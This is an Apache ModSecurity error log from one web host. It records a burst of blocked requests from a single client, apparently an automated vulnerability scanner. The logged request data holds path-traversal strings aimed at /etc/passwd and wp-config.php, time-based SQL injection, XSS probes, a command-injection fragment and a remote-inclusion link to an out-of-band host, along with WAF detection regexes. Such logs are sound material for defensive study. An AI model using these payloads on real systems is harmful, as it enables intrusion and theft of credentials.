[Tue Aug 29 11:43:08.587184 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/MicroStrategy/servlet/taskProc"] [unique_id "ZO13XMCo-f0AAAcoNnkAAAAF"]
[Tue Aug 29 11:43:09.372096 2023] [:error] [pid 1968] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/themes/NativeChurch/download/download.php"] [unique_id "ZO13XcCo-f0AAAewCUsAAAAI"]
[Tue Aug 29 11:43:10.369335 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:download_file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13XsCo-f0AAAdQ3kgAAAAV"]
[Tue Aug 29 11:43:11.424461 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php"] [unique_id "ZO13X8Co-f0AAAdSZQ4AAAAX"]
[Tue Aug 29 11:43:14.429312 2023] [:error] [pid 1968] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpv-image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:wpv-image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO13YsCo-f0AAAewCWEAAAAI"]
[Tue Aug 29 11:43:15.654065 2023] [:error] [pid 1969] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13Y8Co-f0AAAexIAMAAAAN"]
[Tue Aug 29 11:43:18.415712 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/document.php"] [unique_id "ZO13ZsCo-f0AAAcoNpcAAAAF"]
[Tue Aug 29 11:43:18.444582 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../LocalConfiguration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php"] [unique_id "ZO13ZsCo-f0AAAeChcUAAAAw"]
[Tue Aug 29 11:43:20.459532 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:cpath: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/fmangersub"] [unique_id "ZO13aMCo-f0AAAdxUWQAAAAC"]
[Tue Aug 29 11:43:21.430919 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../ found within ARGS:file: /../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO13acCo-f0AAAdECfoAAAAW"]
[Tue Aug 29 11:43:21.560775 2023] [:error] [pid 1973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13acCo-f0AAAe1eeYAAAAB"]
[Tue Aug 29 11:43:23.409712 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13a8Co-f0AAAXNubcAAAAg"]
[Tue Aug 29 11:43:25.400495 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:token: {{token}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO13bcCo-f0AAAcvBoYAAAAJ"]
[Tue Aug 29 11:43:27.654533 2023] [:error] [pid 1984] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:id[1]: =(SELECT/**/1/**/WHERE/**/SLEEP(6))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-json/notificationx/v1/notification/1"] [unique_id "ZO13b8Co-f0AAAfAOZ0AAAAH"]
[Tue Aug 29 11:43:28.524018 2023] [:error] [pid 1973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(0)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13cMCo-f0AAAe1ef8AAAAB"]
[Tue Aug 29 11:43:29.440227 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(10)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13ccCo-f0AAAdeQ44AAAAQ"]
[Tue Aug 29 11:43:30.419540 2023] [:error] [pid 1991] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13csCo-f0AAAfH1RQAAAAZ"]
[Tue Aug 29 11:43:31.407356 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:locale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:locale: ../../../../../../../lib/password.properties\\x00en"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/CFIDE/administrator/enter.cfm"] [unique_id "ZO13c8Co-f0AAAcvBqQAAAAJ"]
[Tue Aug 29 11:43:36.388191 2023] [:error] [pid 1993] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13eMCo-f0AAAfJuegAAAAa"]
[Tue Aug 29 11:43:37.444070 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ebookdownloadurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:ebookdownloadurl: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/ebook-download/filedownload.php"] [unique_id "ZO13ecCo-f0AAAe8l1wAAAAF"]
[Tue Aug 29 11:43:40.371784 2023] [:error] [pid 1989] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:m(?:s(?:ysaccessobjects|ysaces|ysobjects|ysqueries|ysrelationships|ysaccessstorage|ysaccessxml|ysmodules|ysmodules2|db)|aster\\\\.\\\\.sysdatabases|ysql\\\\.db)|s(?:ys(?:\\\\.database_name|aux)|chema(?:\\\\W*\\\\(|_name)|qlite(_temp)?_master)|d(?:atabas|b_n ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "84"] [id "981320"] [rev "2"] [msg "SQL Injection Attack: Common DB Names Detected"] [data "Matched Data: db_name( found within XML: \\x0a  \\x0a    \\x0a      1=db_name(1)\\x0a    \\x0a  \\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/iOffice/prg/set/wss/udfmr.asmx"] [unique_id "ZO13fMCo-f0AAAfFKAoAAAAR"]
[Tue Aug 29 11:43:40.480396 2023] [:error] [pid 1989] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) =  found within ARGS:q: 20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null  OR (1 1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO13fMCo-f0AAAfFKA8AAAAR"]
[Tue Aug 29 11:43:42.560622 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pow. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:pow: sds\\x22><script>alert(document.domain)</script><\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/Solar_SlideSub.php"] [unique_id "ZO13fsCo-f0AAAdeQ6gAAAAQ"]
[Tue Aug 29 11:43:43.372438 2023] [:error] [pid 1985] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:valore. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:valore: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/file"] [unique_id "ZO13f8Co-f0AAAfBL1EAAAAI"]
[Tue Aug 29 11:43:45.396756 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:s_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:s_id: 1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/arcade.php"] [unique_id "ZO13gcCo-f0AAAenGasAAAAM"]
[Tue Aug 29 11:43:47.407340 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/render.html"] [unique_id "ZO13g8Co-f0AAARpg-UAAAAU"]
[Tue Aug 29 11:43:48.431517 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:step. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:step: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/ad-widget/views/modal/"] [unique_id "ZO13hMCo-f0AAAcsLNIAAAAE"]
[Tue Aug 29 11:43:48.449939 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13hMCo-f0AAAeX1JIAAAAK"]
[Tue Aug 29 11:43:49.443313 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/alerts/alertLightbox.php"] [unique_id "ZO13hcCo-f0AAAdftc8AAAAG"]
[Tue Aug 29 11:43:50.387923 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibfkip.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO13hsCo-f0AAARphAIAAAAU"]
[Tue Aug 29 11:43:50.466415 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:template_path: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/koha/svc/virtualshelves/search"] [unique_id "ZO13hsCo-f0AAAcsLN4AAAAE"]
[Tue Aug 29 11:43:51.381428 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:inputFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:inputFile: ../../../../../index.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/resin-doc/resource/tutorial/jndi-appconfig/test"] [unique_id "ZO13h8Co-f0AAARphAYAAAAU"]
[Tue Aug 29 11:43:54.925592 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13isCo-f0AAAfEBvUAAAAO"]
